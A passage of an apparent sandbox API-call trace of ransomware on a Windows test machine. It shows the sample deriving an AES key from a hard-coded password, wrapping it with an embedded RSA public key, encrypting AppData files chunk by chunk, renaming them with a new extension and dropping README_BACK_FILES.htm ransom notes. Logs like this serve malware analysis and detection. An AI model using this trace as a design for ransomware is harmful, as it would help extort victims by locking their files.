dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f255f8) returned 1 [0267.943] CryptImportPublicKeyInfo (in: hCryptProv=0x2f255f8, dwCertEncodingType=0x1, pInfo=0x2f30070*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f300a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f300a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f240) returned 1 [0267.943] CryptEncrypt (in: hKey=0x2e7f240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0267.943] CryptEncrypt (in: hKey=0x2e7f240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25790*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f25790*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0267.943] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f25790*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f25790*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0267.945] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.950] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.951] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.989] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.990] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.990] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.990] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.990] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.990] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.990] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.991] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.991] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.991] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.991] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.991] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.991] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.991] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.991] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.991] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.991] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.991] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.992] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.992] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.992] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.992] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.992] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.993] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.993] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.993] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.993] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.993] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.993] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.993] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.993] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.993] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0267.994] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0267.994] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x66, lpOverlapped=0x0) returned 1 [0267.994] CryptEncrypt (in: hKey=0x2e7f1c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x66, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x70) returned 1 [0267.994] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x70, lpOverlapped=0x0) returned 1 [0267.994] CloseHandle (hObject=0x5d48) returned 1 [0267.994] CloseHandle (hObject=0x5d3c) returned 1 [0267.994] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\versionlist.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\versionlist.xml"), bFailIfExists=0) returned 1 [0268.010] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml", dwFileAttributes=0x0) returned 1 [0268.011] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\versionlist.xml.gsg")) returned 1 [0268.013] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\versionlist.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\versionlist.xml.fuck")) returned 1 [0268.014] CryptDestroyHash (hHash=0x2e7ec80) returned 1 [0268.014] CryptDestroyKey (hKey=0x2e7f1c0) returned 1 [0268.014] CryptReleaseContext (hProv=0x2f250a8, dwFlags=0x0) returned 1 [0268.015] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0268.015] FindClose (in: hFindFile=0x2e7eb80 | out: hFindFile=0x2e7eb80) returned 1 [0268.015] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\readme_back_files.htm")) returned 0xffffffff [0268.016] AreFileApisANSI () returned 1 [0268.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0268.016] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0268.024] GetFileType (hFile=0x5d44) returned 0x1 [0268.024] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0268.025] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0268.025] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0268.026] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\readme_back_files.htm")) returned 0xffffffff [0268.026] AreFileApisANSI () returned 1 [0268.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889480, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0268.026] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Internet Explorer\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\internet explorer\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0268.027] GetFileType (hFile=0x5d10) returned 0x1 [0268.028] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0268.029] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0268.029] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2e7fbc0 [0268.029] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0268.029] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0268.030] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2e7fc00 [0268.030] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0268.030] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0268.030] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2e7eb80 [0268.032] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0268.032] FindNextFileA (in: hFindFile=0x2e7eb80, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0268.032] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2e7ec80 [0268.034] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.034] FindNextFileA (in: hFindFile=0x2e7ec80, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0268.034] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9dac8 | out: lpSystemTimeAsFileTime=0x2b9dac8) [0268.034] GetLastError () returned 0x0 [0268.034] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\01_music_auto_rated_at_5_stars.wpl")) returned 0x20 [0268.035] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\01_Music_auto_rated_at_5_stars.wpl", dwFileAttributes=0x80) returned 1 [0268.035] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0268.037] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\01_Music_auto_rated_at_5_stars.wpl.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\01_music_auto_rated_at_5_stars.wpl.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0268.039] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\01_Music_auto_rated_at_5_stars.wpl.gsg", dwFileAttributes=0x2) returned 1 [0268.039] CryptAcquireContextA (in: phProv=0x2b9cac4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9cac4*=0x2f25818) returned 1 [0268.042] CryptCreateHash (in: hProv=0x2f25818, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9cac8 | out: phHash=0x2b9cac8) returned 1 [0268.042] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.042] CryptHashData (hHash=0x2e7f1c0, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.042] CryptDeriveKey (in: hProv=0x2f25818, Algid=0x6610, hBaseData=0x2e7f1c0, dwFlags=0x1000000, phKey=0x2b9cab4 | out: phKey=0x2b9cab4*=0x2e7f280) returned 1 [0268.042] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9cad0, pcbBinary=0x2b9cab0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.042] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9cad0, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac | out: pvStructInfo=0x2b9caa4, pcbStructInfo=0x2b9caac) returned 1 [0268.042] CryptAcquireContextA (in: phProv=0x2b9cac0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9cac0*=0x2f251b8) returned 1 [0268.043] CryptImportPublicKeyInfo (in: hCryptProv=0x2f251b8, dwCertEncodingType=0x1, pInfo=0x2f303b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f303e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f303e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9cab8 | out: phKey=0x2b9cab8*=0x2e7f440) returned 1 [0268.043] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9caa8*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9caa8*=0x80) returned 1 [0268.043] CryptEncrypt (in: hKey=0x2e7f440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f24e00*, pdwDataLen=0x2b9cabc*=0x18, dwBufLen=0x80 | out: pbData=0x2f24e00*, pdwDataLen=0x2b9cabc*=0x80) returned 1 [0268.043] WriteFile (in: hFile=0x5d50, lpBuffer=0x2f24e00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9cacc, lpOverlapped=0x0 | out: lpBuffer=0x2f24e00*, lpNumberOfBytesWritten=0x2b9cacc*=0x80, lpOverlapped=0x0) returned 1 [0268.044] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 